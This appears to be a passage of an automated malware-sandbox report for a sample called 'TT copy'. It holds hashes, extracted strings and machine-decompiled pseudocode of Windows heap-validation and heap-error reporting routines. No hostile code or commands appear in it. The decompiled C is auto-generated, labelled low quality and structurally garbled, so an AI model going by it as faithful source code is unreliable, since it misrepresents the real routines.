                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.352260346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_TT copy.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ExitProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 621844428-0
                                                                                                            • Opcode ID: dd58d9cb5515d5919411ade5dad0607ecc51d7287a1ae8ea2044e41645b9bd5c
                                                                                                            • Instruction ID: 2c3f141c7e09411b3ec646d9a96b7411eda0e306f012c5d4efef731340dd2862
                                                                                                            • Opcode Fuzzy Hash: dd58d9cb5515d5919411ade5dad0607ecc51d7287a1ae8ea2044e41645b9bd5c
                                                                                                            • Instruction Fuzzy Hash: C0B012D95F20162B903031700C068EF071844D140575B8A6EB31059601B58C833500F3
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010A967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 870e714fee660fbf75a3878f46d0ebce51e7cfa72e54322159865bb76412f148
                                                                                                            • Instruction ID: f26de99cae080efd5a0018142d42ddc715abe22816a90ea2438e1acf9644d06e
                                                                                                            • Opcode Fuzzy Hash: 870e714fee660fbf75a3878f46d0ebce51e7cfa72e54322159865bb76412f148
                                                                                                            • Instruction Fuzzy Hash: 9DB09B719014D5C6D651D7E446087177A40BBD4745F56C061D1420641BC778D091F6B5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Non-executed Functions

                                                                                                            Function 0111B260 Relevance: 37.8, Strings: 30, Instructions: 262COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0111B305
                                                                                                            • *** then kb to get the faulting stack, xrefs: 0111B51C
                                                                                                            • The resource is owned shared by %d threads, xrefs: 0111B37E
                                                                                                            • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0111B2F3
                                                                                                            • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0111B47D
                                                                                                            • *** enter .exr %p for the exception record, xrefs: 0111B4F1
                                                                                                            • <unknown>, xrefs: 0111B27E, 0111B2D1, 0111B350, 0111B399, 0111B417, 0111B48E
                                                                                                            • *** Resource timeout (%p) in %ws:%s, xrefs: 0111B352
                                                                                                            • *** enter .cxr %p for the context, xrefs: 0111B50D
                                                                                                            • The instruction at %p tried to %s , xrefs: 0111B4B6
                                                                                                            • The instruction at %p referenced memory at %p., xrefs: 0111B432
                                                                                                            • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0111B53F
                                                                                                            • This failed because of error %Ix., xrefs: 0111B446
                                                                                                            • write to, xrefs: 0111B4A6
                                                                                                            • *** Inpage error in %ws:%s, xrefs: 0111B418
                                                                                                            • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0111B39B
                                                                                                            • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0111B2DC
                                                                                                            • a NULL pointer, xrefs: 0111B4E0
                                                                                                            • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0111B323
                                                                                                            • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0111B314
                                                                                                            • Go determine why that thread has not released the critical section., xrefs: 0111B3C5
                                                                                                            • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0111B476
                                                                                                            • an invalid address, %p, xrefs: 0111B4CF
                                                                                                            • The critical section is owned by thread %p., xrefs: 0111B3B9
                                                                                                            • *** An Access Violation occurred in %ws:%s, xrefs: 0111B48F
                                                                                                            • read from, xrefs: 0111B4AD, 0111B4B2
                                                                                                            • The resource is owned exclusively by thread %p, xrefs: 0111B374
                                                                                                            • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0111B3D6
                                                                                                            • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0111B38F
                                                                                                            • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0111B484
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                                            • API String ID: 0-108210295
                                                                                                            • Opcode ID: 295ba13f4bca2f3ec98db5162f269c7d995b53be25b33cdadc6ea81631e73294
                                                                                                            • Instruction ID: 166b07ad0f85aa543635b65ca730791fd2956693e9e4d9ef49cc9fd2d86d76a5
                                                                                                            • Opcode Fuzzy Hash: 295ba13f4bca2f3ec98db5162f269c7d995b53be25b33cdadc6ea81631e73294
                                                                                                            • Instruction Fuzzy Hash: 2D818530A48210FFDB296B4ADC86EAB7F36EF56B10F01406DFA841F116D3609451CBB6
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01121C06 Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 44%
                                                                                                            			E01121C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x10448a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0106B150();
				} else {
					E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x115589c);
				E0106B150("Heap error detected at %p (heap handle %p)\n",  *0x11558a0);
				_t27 =  *0x1155898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M01121E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0106B150();
				} else {
					E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0106B150("Error code: %d - %s\n",  *0x1155898);
				_t113 =  *0x11558a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0106B150();
					} else {
						E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0106B150("Parameter1: %p\n",  *0x11558a4);
				}
				_t115 =  *0x11558a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0106B150();
					} else {
						E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0106B150("Parameter2: %p\n",  *0x11558a8);
				}
				_t117 =  *0x11558ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0106B150();
					} else {
						E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0106B150("Parameter3: %p\n",  *0x11558ac);
				}
				_t119 =  *0x11558b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0106B150();
					} else {
						E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x11558b4);
					E0106B150("Last known valid blocks: before - %p, after - %p\n",  *0x11558b0);
				} else {
					_t120 =  *0x11558b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0106B150();
				} else {
					E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0106B150("Stack trace available at %p\n", 0x11558c0);
			}











                                                                                                            0x01121c10
                                                                                                            0x01121c16
                                                                                                            0x01121c1e
                                                                                                            0x01121c3d
                                                                                                            0x01121c3e
                                                                                                            0x01121c20
                                                                                                            0x01121c35
                                                                                                            0x01121c3a
                                                                                                            0x01121c44
                                                                                                            0x01121c55
                                                                                                            0x01121c5a
                                                                                                            0x01121c65
                                                                                                            0x01121c67
                                                                                                            0x00000000
                                                                                                            0x01121c6e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01121c67
                                                                                                            0x01121cdc
                                                                                                            0x01121ce5
                                                                                                            0x01121d04
                                                                                                            0x01121d05
                                                                                                            0x01121ce7
                                                                                                            0x01121cfc
                                                                                                            0x01121d01
                                                                                                            0x01121d0b
                                                                                                            0x01121d17
                                                                                                            0x01121d1f
                                                                                                            0x01121d25
                                                                                                            0x01121d30
                                                                                                            0x01121d4f
                                                                                                            0x01121d50
                                                                                                            0x01121d32
                                                                                                            0x01121d47
                                                                                                            0x01121d4c
                                                                                                            0x01121d61
                                                                                                            0x01121d67
                                                                                                            0x01121d68
                                                                                                            0x01121d6e
                                                                                                            0x01121d79
                                                                                                            0x01121d98
                                                                                                            0x01121d99
                                                                                                            0x01121d7b
                                                                                                            0x01121d90
                                                                                                            0x01121d95
                                                                                                            0x01121daa
                                                                                                            0x01121db0
                                                                                                            0x01121db1
                                                                                                            0x01121db7
                                                                                                            0x01121dc2
                                                                                                            0x01121de1
                                                                                                            0x01121de2
                                                                                                            0x01121dc4
                                                                                                            0x01121dd9
                                                                                                            0x01121dde
                                                                                                            0x01121df3
                                                                                                            0x01121df9
                                                                                                            0x01121dfa
                                                                                                            0x01121e00
                                                                                                            0x01121e0a
                                                                                                            0x01121e13
                                                                                                            0x01121e32
                                                                                                            0x01121e33
                                                                                                            0x01121e15
                                                                                                            0x01121e2a
                                                                                                            0x01121e2f
                                                                                                            0x01121e39
                                                                                                            0x01121e4a
                                                                                                            0x01121e02
                                                                                                            0x01121e02
                                                                                                            0x01121e08
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01121e08
                                                                                                            0x01121e5b
                                                                                                            0x01121e7a
                                                                                                            0x01121e7b
                                                                                                            0x01121e5d
                                                                                                            0x01121e72
                                                                                                            0x01121e77
                                                                                                            0x01121e95

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                                                            • API String ID: 0-2897834094
                                                                                                            • Opcode ID: 7a1bc0ae57f780f90c969ebe52e015fe316b5b9062b13854a3b78edf0efac8d7
                                                                                                            • Instruction ID: 3a0223f06f9f7d03a9865898aa89dcf1c51223142efa27ec01bb3d5a63359502
                                                                                                            • Opcode Fuzzy Hash: 7a1bc0ae57f780f90c969ebe52e015fe316b5b9062b13854a3b78edf0efac8d7
                                                                                                            • Instruction Fuzzy Hash: F761F8B7610169FFD36DEB4AD484D35B3A9EB0493474A807EF9899F301D72099A08F1A
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01124AEF Relevance: 11.8, Strings: 9, Instructions: 529COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 59%
                                                                                                            			E01124AEF(void* __ecx, signed int __edx, intOrPtr* _a8, signed int* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t189;
				intOrPtr _t191;
				intOrPtr _t210;
				signed int _t225;
				signed char _t231;
				intOrPtr _t232;
				unsigned int _t245;
				intOrPtr _t249;
				intOrPtr _t259;
				signed int _t281;
				signed int _t283;
				intOrPtr _t284;
				signed int _t288;
				signed int* _t294;
				signed int* _t298;
				intOrPtr* _t299;
				intOrPtr* _t300;
				signed int _t307;
				signed int _t309;
				signed short _t312;
				signed short _t315;
				signed int _t317;
				signed int _t320;
				signed int _t322;
				signed int _t326;
				signed int _t327;
				void* _t328;
				signed int _t332;
				signed int _t340;
				signed int _t342;
				signed char _t344;
				signed int* _t345;
				void* _t346;
				signed char _t352;
				signed char _t367;
				signed int _t374;
				intOrPtr* _t378;
				signed int _t380;
				signed int _t385;
				signed char _t390;
				unsigned int _t392;
				signed char _t395;
				unsigned int _t397;
				intOrPtr* _t400;
				signed int _t402;
				signed int _t405;
				intOrPtr* _t406;
				signed int _t407;
				intOrPtr _t412;
				void* _t414;
				signed int _t415;
				signed int _t416;
				signed int _t429;

				_v16 = _v16 & 0x00000000;
				_t189 = 0;
				_v8 = _v8 & 0;
				_t332 = __edx;
				_v12 = 0;
				_t414 = __ecx;
				_t415 = __edx;
				if(__edx >=  *((intOrPtr*)(__edx + 0x28))) {
					L88:
					_t416 = _v16;
					if( *((intOrPtr*)(_t332 + 0x2c)) == _t416) {
						__eflags =  *((intOrPtr*)(_t332 + 0x30)) - _t189;
						if( *((intOrPtr*)(_t332 + 0x30)) == _t189) {
							L107:
							return 1;
						}
						_t191 =  *[fs:0x30];
						__eflags =  *(_t191 + 0xc);
						if( *(_t191 + 0xc) == 0) {
							_push("HEAP: ");
							E0106B150();
						} else {
							E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v12);
						_push( *((intOrPtr*)(_t332 + 0x30)));
						_push(_t332);
						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
						L122:
						E0106B150();
						L119:
						return 0;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E0106B150();
					} else {
						E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t416);
					_push( *((intOrPtr*)(_t332 + 0x2c)));
					_push(_t332);
					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
					goto L122;
				} else {
					goto L1;
				}
				do {
					L1:
					 *_a16 = _t415;
					if( *(_t414 + 0x4c) != 0) {
						_t392 =  *(_t414 + 0x50) ^  *_t415;
						 *_t415 = _t392;
						_t352 = _t392 >> 0x00000010 ^ _t392 >> 0x00000008 ^ _t392;
						_t424 = _t392 >> 0x18 - _t352;
						if(_t392 >> 0x18 != _t352) {
							_push(_t352);
							E0111FA2B(_t332, _t414, _t415, _t414, _t415, _t424);
						}
					}
					if(_v8 != ( *(_t415 + 4) ^  *(_t414 + 0x54))) {
						_t210 =  *[fs:0x30];
						__eflags =  *(_t210 + 0xc);
						if( *(_t210 + 0xc) == 0) {
							_push("HEAP: ");
							E0106B150();
						} else {
							E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v8 & 0x0000ffff);
						_t340 =  *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff;
						__eflags = _t340;
						_push(_t340);
						E0106B150("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t415);
						L117:
						__eflags =  *(_t414 + 0x4c);
						if( *(_t414 + 0x4c) != 0) {
							 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
							 *_t415 =  *_t415 ^  *(_t414 + 0x50);
							__eflags =  *_t415;
						}
						goto L119;
					}
					_t225 =  *_t415 & 0x0000ffff;
					_t390 =  *(_t415 + 2);
					_t342 = _t225;
					_v8 = _t342;
					_v20 = _t342;
					_v28 = _t225 << 3;
					if((_t390 & 0x00000001) == 0) {
						__eflags =  *(_t414 + 0x40) & 0x00000040;
						_t344 = (_t342 & 0xffffff00 | ( *(_t414 + 0x40) & 0x00000040) != 0x00000000) & _t390 >> 0x00000002;
						__eflags = _t344 & 0x00000001;
						if((_t344 & 0x00000001) == 0) {
							L66:
							_t345 = _a12;
							 *_a8 =  *_a8 + 1;
							 *_t345 =  *_t345 + ( *_t415 & 0x0000ffff);
							__eflags =  *_t345;
							L67:
							_t231 =  *(_t415 + 6);
							if(_t231 == 0) {
								_t346 = _t414;
							} else {
								_t346 = (_t415 & 0xffff0000) - ((_t231 & 0x000000ff) << 0x10) + 0x10000;
							}
							if(_t346 != _t332) {
								_t232 =  *[fs:0x30];
								__eflags =  *(_t232 + 0xc);
								if( *(_t232 + 0xc) == 0) {
									_push("HEAP: ");
									E0106B150();
								} else {
									E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t415 + 6) & 0x000000ff);
								_push(_t415);
								_push("Heap block at %p has incorrect segment offset (%x)\n");
								goto L95;
							} else {
								if( *((char*)(_t415 + 7)) != 3) {
									__eflags =  *(_t414 + 0x4c);
									if( *(_t414 + 0x4c) != 0) {
										 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
										 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										__eflags =  *_t415;
									}
									_t415 = _t415 + _v28;
									__eflags = _t415;
									goto L86;
								}
								_t245 =  *(_t415 + 0x1c);
								if(_t245 == 0) {
									_t395 =  *_t415 & 0x0000ffff;
									_v6 = _t395 >> 8;
									__eflags = _t415 + _t395 * 8 -  *((intOrPtr*)(_t332 + 0x28));
									if(_t415 + _t395 * 8 ==  *((intOrPtr*)(_t332 + 0x28))) {
										__eflags =  *(_t414 + 0x4c);
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^ _v6 ^ _t395;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											__eflags =  *_t415;
										}
										goto L107;
									}
									_t249 =  *[fs:0x30];
									__eflags =  *(_t249 + 0xc);
									if( *(_t249 + 0xc) == 0) {
										_push("HEAP: ");
										E0106B150();
									} else {
										E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_push( *((intOrPtr*)(_t332 + 0x28)));
									_push(_t415);
									_push("Heap block at %p is not last block in segment (%p)\n");
									L95:
									E0106B150();
									goto L117;
								}
								_v12 = _v12 + 1;
								_v16 = _v16 + (_t245 >> 0xc);
								if( *(_t414 + 0x4c) != 0) {
									 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
									 *_t415 =  *_t415 ^  *(_t414 + 0x50);
								}
								_t415 = _t415 + 0x20 +  *(_t415 + 0x1c);
								if(_t415 ==  *((intOrPtr*)(_t332 + 0x28))) {
									L82:
									_v8 = _v8 & 0x00000000;
									goto L86;
								} else {
									if( *(_t414 + 0x4c) != 0) {
										_t397 =  *(_t414 + 0x50) ^  *_t415;
										 *_t415 = _t397;
										_t367 = _t397 >> 0x00000010 ^ _t397 >> 0x00000008 ^ _t397;
										_t442 = _t397 >> 0x18 - _t367;
										if(_t397 >> 0x18 != _t367) {
											_push(_t367);
											E0111FA2B(_t332, _t414, _t415, _t414, _t415, _t442);
										}
									}
									if( *(_t414 + 0x54) !=  *(_t415 + 4)) {
										_t259 =  *[fs:0x30];
										__eflags =  *(_t259 + 0xc);
										if( *(_t259 + 0xc) == 0) {
											_push("HEAP: ");
											E0106B150();
										} else {
											E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push( *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff);
										_push(_t415);
										_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
										goto L95;
									} else {
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										}
										goto L82;
									}
								}
							}
						}
						_t281 = _v28 + 0xfffffff0;
						_v24 = _t281;
						__eflags = _t390 & 0x00000002;
						if((_t390 & 0x00000002) != 0) {
							__eflags = _t281 - 4;
							if(_t281 > 4) {
								_t281 = _t281 - 4;
								__eflags = _t281;
								_v24 = _t281;
							}
						}
						__eflags = _t390 & 0x00000008;
						if((_t390 & 0x00000008) == 0) {
							_t102 = _t415 + 0x10; // -8
							_t283 = E010BD540(_t102, _t281, 0xfeeefeee);
							_v20 = _t283;
							__eflags = _t283 - _v24;
							if(_t283 != _v24) {
								_t284 =  *[fs:0x30];
								__eflags =  *(_t284 + 0xc);
								if( *(_t284 + 0xc) == 0) {
									_push("HEAP: ");
									E0106B150();
								} else {
									E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_t288 = _v20 + 8 + _t415;
								__eflags = _t288;
								_push(_t288);
								_push(_t415);
								_push("Free Heap block %p modified at %p after it was freed\n");
								goto L95;
							}
							goto L66;
						} else {
							_t374 =  *(_t415 + 8);
							_t400 =  *((intOrPtr*)(_t415 + 0xc));
							_v24 = _t374;
							_v28 = _t400;
							_t294 =  *(_t374 + 4);
							__eflags =  *_t400 - _t294;
							if( *_t400 != _t294) {
								L64:
								_push(_t374);
								_push( *_t400);
								_t101 = _t415 + 8; // -16
								E0112A80D(_t414, 0xd, _t101, _t294);
								goto L86;
							}
							_t56 = _t415 + 8; // -16
							__eflags =  *_t400 - _t56;
							_t374 = _v24;
							if( *_t400 != _t56) {
								goto L64;
							}
							 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) - _v20;
							_t402 =  *(_t414 + 0xb4);
							__eflags = _t402;
							if(_t402 == 0) {
								L35:
								_t298 = _v28;
								 *_t298 = _t374;
								 *(_t374 + 4) = _t298;
								__eflags =  *(_t415 + 2) & 0x00000008;
								if(( *(_t415 + 2) & 0x00000008) == 0) {
									L39:
									_t377 =  *_t415 & 0x0000ffff;
									_t299 = _t414 + 0xc0;
									_v28 =  *_t415 & 0x0000ffff;
									 *(_t415 + 2) = 0;
									 *((char*)(_t415 + 7)) = 0;
									__eflags =  *(_t414 + 0xb4);
									if( *(_t414 + 0xb4) == 0) {
										_t378 =  *_t299;
									} else {
										_t378 = E0108E12C(_t414, _t377);
										_t299 = _t414 + 0xc0;
									}
									__eflags = _t299 - _t378;
									if(_t299 == _t378) {
										L51:
										_t300 =  *((intOrPtr*)(_t378 + 4));
										__eflags =  *_t300 - _t378;
										if( *_t300 != _t378) {
											_push(_t378);
											_push( *_t300);
											__eflags = 0;
											E0112A80D(0, 0xd, _t378, 0);
										} else {
											_t87 = _t415 + 8; // -16
											_t406 = _t87;
											 *_t406 = _t378;
											 *((intOrPtr*)(_t406 + 4)) = _t300;
											 *_t300 = _t406;
											 *((intOrPtr*)(_t378 + 4)) = _t406;
										}
										 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) + ( *_t415 & 0x0000ffff);
										_t405 =  *(_t414 + 0xb4);
										__eflags = _t405;
										if(_t405 == 0) {
											L61:
											__eflags =  *(_t414 + 0x4c);
											if(__eflags != 0) {
												 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
												 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											}
											goto L86;
										} else {
											_t380 =  *_t415 & 0x0000ffff;
											while(1) {
												__eflags = _t380 -  *((intOrPtr*)(_t405 + 4));
												if(_t380 <  *((intOrPtr*)(_t405 + 4))) {
													break;
												}
												_t307 =  *_t405;
												__eflags = _t307;
												if(_t307 == 0) {
													_t309 =  *((intOrPtr*)(_t405 + 4)) - 1;
													L60:
													_t94 = _t415 + 8; // -16
													E0108E4A0(_t414, _t405, 1, _t94, _t309, _t380);
													goto L61;
												}
												_t405 = _t307;
											}
											_t309 = _t380;
											goto L60;
										}
									} else {
										_t407 =  *(_t414 + 0x4c);
										while(1) {
											__eflags = _t407;
											if(_t407 == 0) {
												_t312 =  *(_t378 - 8) & 0x0000ffff;
											} else {
												_t315 =  *(_t378 - 8);
												_t407 =  *(_t414 + 0x4c);
												__eflags = _t315 & _t407;
												if((_t315 & _t407) != 0) {
													_t315 = _t315 ^  *(_t414 + 0x50);
													__eflags = _t315;
												}
												_t312 = _t315 & 0x0000ffff;
											}
											__eflags = _v28 - (_t312 & 0x0000ffff);
											if(_v28 <= (_t312 & 0x0000ffff)) {
												goto L51;
											}
											_t378 =  *_t378;
											__eflags = _t414 + 0xc0 - _t378;
											if(_t414 + 0xc0 != _t378) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
								}
								_t317 = E0108A229(_t414, _t415);
								__eflags = _t317;
								if(_t317 != 0) {
									goto L39;
								}
								E0108A309(_t414, _t415,  *_t415 & 0x0000ffff, 1);
								goto L86;
							}
							_t385 =  *_t415 & 0x0000ffff;
							while(1) {
								__eflags = _t385 -  *((intOrPtr*)(_t402 + 4));
								if(_t385 <  *((intOrPtr*)(_t402 + 4))) {
									break;
								}
								_t320 =  *_t402;
								__eflags = _t320;
								if(_t320 == 0) {
									_t322 =  *((intOrPtr*)(_t402 + 4)) - 1;
									L34:
									_t63 = _t415 + 8; // -16
									E0108BC04(_t414, _t402, 1, _t63, _t322, _t385);
									_t374 = _v24;
									goto L35;
								}
								_t402 = _t320;
							}
